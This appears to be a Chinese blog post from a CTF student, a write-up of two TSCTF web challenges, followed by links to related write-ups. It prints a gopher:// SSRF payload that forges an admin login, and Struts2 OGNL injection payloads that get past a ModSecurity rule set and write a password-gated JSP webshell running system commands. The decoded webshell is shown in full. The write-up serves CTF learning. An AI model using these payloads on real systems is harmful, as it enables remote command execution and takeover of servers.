TSCTF 之web萌新瞎扯(二)

最新推荐文章于 2021-12-19 10:51:03 发布
置顶 最新推荐文章于 2021-12-19 10:51:03 发布
阅读量655 收藏
点赞数
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41788666/article/details/80589825
版权

一,emmmmm

    用扫描器扫描敏感目录,可以看到robots协议是开放的,查看robots协议 ,发现里面暴露了敏感目录backup以及phpinfo,访问backup发现里面有数据库备份文件,可以拿到管理员的账号和密码为admin和bupt666,试着去登录,发现

**Warning!** login failed! admin's login ip must be 127.0.0.1 (attention: http server's local port is 80)!

接着去查看phpinfo,发现开了gopher协议,于是我们可以利用gopher协议让服务器post admin的登录包,

首先登录来到后台,抓包记录下当前的sessionid,将cookie删掉后发包,记录下set-cookie的值,然后构造gopher协议

url=gopher://127.0.0.1:80/_POST%20%2findex.php%253Faction%3Dlogin%20HTTP%2f1.1%250d%250aHost%3A%20localhost%3A9000%250d%250aCookie%3A%20PHPSESSID%3D169f13c39a9acc14032583cb99595cda%3B%250d%250aConnection%3A%20close%250d%250aContent-Type%3A%20application%2fx-www-form-urlencoded%250d%250aContent-Length%3A%2031%250d%250a%250d%250ausername%3Dadmin%26password%3Dbupt666

gopher中的sessionid用的是set-cookie的值,发包的cookie用登录时的sessionid,发完之后,用set-cookie的sessionid登录,既可看到flag。


二,时光机

    是一个struts2的漏洞,需要绕过modsecurity规则,规则hint中已经给出

https://github.com/SpiderLabs/owasp-modsecurity-crs/blob/v3.1/dev/rules/REQUEST-944-APPLICATION-ATTACK-JAVA.conf

关于漏洞的具体信息以及利用方法

https://paper.seebug.org/241/

但是由于有waf,先有的exp都打不了,需要自己构造ognl表达式,首先需要拿到web应用的目录 官方wp中给出的payload

Content-Type: %{(#_='multipart/form-data').(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#a=(new ognl.OgnlContext())).(#path=#a.getClass().getResource("").getPath()).(#os=@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()).(#os.write(#path.getBytes())).(#os.flush())}

拿到目录之后构造ognl表达式写入webshell,并通过webshell执行命令,官方给出的webshell如下

%{(#_='multipart/form-data').(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(new java.io.RandomAccessFile("/usr/local/tomcat/webapps/ROOT/shell.jsp","rw")).write(@java.util.Base64@getDecoder().decode("PCUKICAgIGlmKCJkbGl2ZSIuZXF1YWxzKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJwd2QiKSkpewogICAgICAgIGphdmEuaW8uSW5wdXRTdHJlYW0gaW4gPSBSdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJpIikpLmdldElucHV0U3RyZWFtKCk7CiAgICAgICAgaW50IGEgPSAtMTsKICAgICAgICBieXRlW10gYiA9IG5ldyBieXRlWzIwNDhdOwogICAgICAgIG91dC5wcmludCgiPHByZT4iKTsKICAgICAgICB3aGlsZSgoYT1pbi5yZWFkKGIpKSE9LTEpewogICAgICAgICAgICBvdXQucHJpbnRsbihuZXcgU3RyaW5nKGIpKTsKICAgICAgICB9CiAgICAgICAgb3V0LnByaW50KCI8L3ByZT4iKTsKICAgIH0KJT4=")

其中的base64解码如下

<%
    if("dlive".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>

然后利用postman posty pwd以及i过去 即可获得flag



Litchi_c
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2018 TSCTF瞎扯
qq_41788666的博客
05-31 662
一. Web1.   Are you in class根据hint猜测应该是构造xff头,查看源代码发现注释删掉注释符号,并构造192网段的xff头,提交得到flag2.   Buy flag进入页面发现要注册,注册页面对age进行了限制,对是否是数字进行了判断,猜测使用了php中的is_numeric函数,用16进制绕过,绕过之后再次使用账号进行登录,发现主页出现了变化,猜测应该是将age带入数...
第二届TSCTF比赛writeup及心得-Web
weixin_34335458的博客
05-11 201
1. 送分题 一开始真没明白为什么叫送分题,后来明白了,泪流满面。。我只想说,查看源码这个事情一辈子都不能忘。 还是推荐以后都用这个,就不会漏了 2.Do you know time 网页显示一张福利图片,下载下来,随便用二进制打开图片,翻到最后面,发现了代码,种子确定了,srand就没意义了,种子是由time()函数确定的,发到服务器上总要一点时间,所以我们用time()+...
第五届TSCTF-RE部分题解
WocW的博客
05-13 857
前言 这个周末参加了一下北邮的TSCTF,可以明确感觉到自己目前缺的是处理数据的工具或者是更高的技巧,许许多多的知识待补!有幸认识了在北邮读研的直系学长,也算是一些收获。 RE1 Checkin 分析 elf文件,IDA观察查看程序很简单。没仔细看,先上动调看看。 这里处理的第一步首先循环右移数据 ror flag[x],x 然后是直接进行已知字符对比验证。 exp a=[0x54,0xa9 ...
[SCTF 2018]ZhuanXV
Sk1y的博客
12-19 841
赛题:[SCTF 2018]ZhuanXV 文章目录赛题:[SCTF 2018]ZhuanXV读取文件sql注入漏洞 读取文件 使用dirsearch工具进行扫描 发现/list,访问是个登录界面,查看源码 发现背景图片的路径 查看web.xml http://111.200.241.244:63455/loadimage?fileName=../../WEB-INF/web.xml 发现使用了strut2框架, struts.xml是struts2的核心配置文件,在开发过程中利用率最高。该文件主
[wp] SCTF 2018 Zhuanxv
MercyLin的博客
09-18 1836
扫目录发现/list,点进去发现要登陆,抓包发现一个请求为 试一下有没有文件读取漏洞
tucao:瞎扯 · 如何正确的吐槽 - 来自知乎日报
05-14
知乎上总有一些幽(dou)默(bi)的回答让我捧腹大笑,自从下载安装了知乎日报后,我明天守着瞎扯专栏,前几天无意发现了知乎日报的 API,便想到了做一个 WEB 专栏的想法,毕竟大家不可能对着 json 看笑话,整个程序很...
各进制数值转换器(二进制,八进制,十进制,十六进制)
02-20
简单易懂。不需要安装,各种平台兼容。简单的东西分享给更多的人,本想简单点,可是强迫我20个字符。我也没办法。瞎扯开了。
json转mask的心酸血泪
12-20
掩模是一种二值图像,其中1表示目标像素,0表示非目标像素,常用于表示对象的精确边界。在本文中,作者分享了在处理数据集时将JSON标注转换为掩模格式过程中的一些挑战和解决方案。 首先,我们要理解JSON标注通常...
拍拍抢拍小工具-006 简洁版
03-13
二)选择抢拍的商品并将地址粘贴至上面,依次输入此商品开始抢拍的小时,分钟,以及秒(必须有值,秒和分钟可以为零),持续时间为分钟,建义不要超过十分钟,默认为五分钟不能为零或负数。 三)点击点击 ,程序会...
python入门到高级全栈工程师培训 第3期 附课件代码
06-07
05 js练习之二级联动 06 jquery以及jquery对象介绍 07 jquery选择器 08 jquery的查找筛选器 09 jquery练习之左侧菜单 第44章 01 jquery属性操作之html,text,val方法 02 jquery循环方法和attr,prop方法 03 jquery...
CTF show题系列
12-22
题目地址:https://ctf.show 0X01 _密码1 1.16进制转字符串 有很多网站可以实现,这里我也附上我的脚本: # author: 羽 def hex_to_str(): while True: s = input("输入要转成字符串的16进制(输入空字符串退出):") if s=='': break k='' try: for i in range(0,len(s),2): j = s[i]+s[i+1]
TSCTF-J 2019 bypass
西部壮仔的博客
04-01 750
题目: <?php highlight_file(__FILE__); if(md5($_GET['pass']) == md5($_GET['username']) && $_GET['pass'] != $_GET['username']){ if(strpos($_GET['username'],"tsctf") === 0){ ...
TSCTF-J 菜鸡的第一个HTML
Lig_HossssT的博客
10-24 202
打开题目 听到歌 点击F12 进入bilibili 由f12看到的内容可知 flag就是歌手名的罗马音nanawoakari 顺便说一句 这个题目描述就是用来生草的XDD
2016 TSCTF 初赛
think_ycx的专栏
04-03 773
pwn1thoughts在第一个子函数布置shellcode(bss段的地址可定位)。puts("I'm zhouheiya, what about you?"); read(0, &format, 0x32u); printf(&format);此处存在bof,计算偏移覆盖返回地址为bss段中shellcode地址即可。puts("I'm datouerzi, what about you?");
2018西安工业大学第二届线上赛web WP
极光时流
10-03 4328
赛题网站:http://117.34.116.134/ WBE 榕榕学姐的美好祝愿 打开链接 右击,查看页面源码 得到flag web1 打开,发现  右击,查看源码,在最下面发现flag web2 打开,查看源码,没有发现有用信息 按F12,查看网络,发现Cookie里藏着flag   web3 打开,发现是代码审计题 审计PHP代码,就是要...
[TSCTF-J] Ezphp
weixin_51804748的博客
10-28 174
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码
SMC代码自修改基础练习题
Agamotto丶的博客
05-19 4674
0x00 代码自修改简介 SMC(self-Modifying Code),就是在真正执行某一段代码时,程序会对自身的该段代码进行自修改,只有在修改后的代码才是可汇编,可执行的。在程序未对该段代码进行修改之前,在静态分析状态下,均是不可读的字节码,IDA之类的反汇编器无法识别程序的正常逻辑。是一种反调试代码技术。 0x01 TSCTF—代码自修改writeup 整体流程 首...
2016 TSCTF 个人赛
think_ycx的专栏
04-03 673
pwn1thoughtsint sub_804857D() { int v1; // [sp+10h] [bp-20h]@1 setbuf(stdin, 0); setbuf(stdout, 0); setbuf(stderr, 0); printf("=====Welcome to tsctf2016!=====\n\nPlease input your name:"); r

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值